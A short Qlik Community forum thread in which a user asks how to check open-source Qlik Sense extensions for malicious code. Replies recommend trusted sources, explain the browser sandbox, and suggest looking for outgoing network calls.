Re: Can extensions carry security risk? - Qlik Community

swarup_malli · ‎2016-02-05

Hi,

I found a couple of open source extension.But before installing them on the Qliksense server ,I want to make sure it does not contain any trojan program that could pose a security risk.

Any tips on how to look for malicious code in extensions?

satishkurra · ‎2016-02-11

Make sure you are downloading from a trusted sites and the websites from Qlik Partners

Also you can refer Stephan Walther's website

qlikblog.at | QlikView / Qlik Sense Blog by Stefan Walther

Alexander_Thor · ‎2016-02-11

So as a rule of thumb extensions poses as much security risk as browsing to Facebook.com, Google.com or any random web page on the web.

Extensions are client side technology, meaning it will execute within the sandbox that is the users browser, so it can't access anything on the server or outside the normal resources a browser can access on the local machine.

The potential risk you are running is that a extension could intercept the data from a app and then pipe that to a third party server somewhere. So I would scan for any outgoing connections such as xmlhttprequest, websockets etc

The Qlik cookies available to steal won't reveal anything special to the attacker apart from a session id which you can lock down with extended security in your virtual proxy.

swarup_malli · ‎2016-02-16

Thank you guys! sorry for the late reply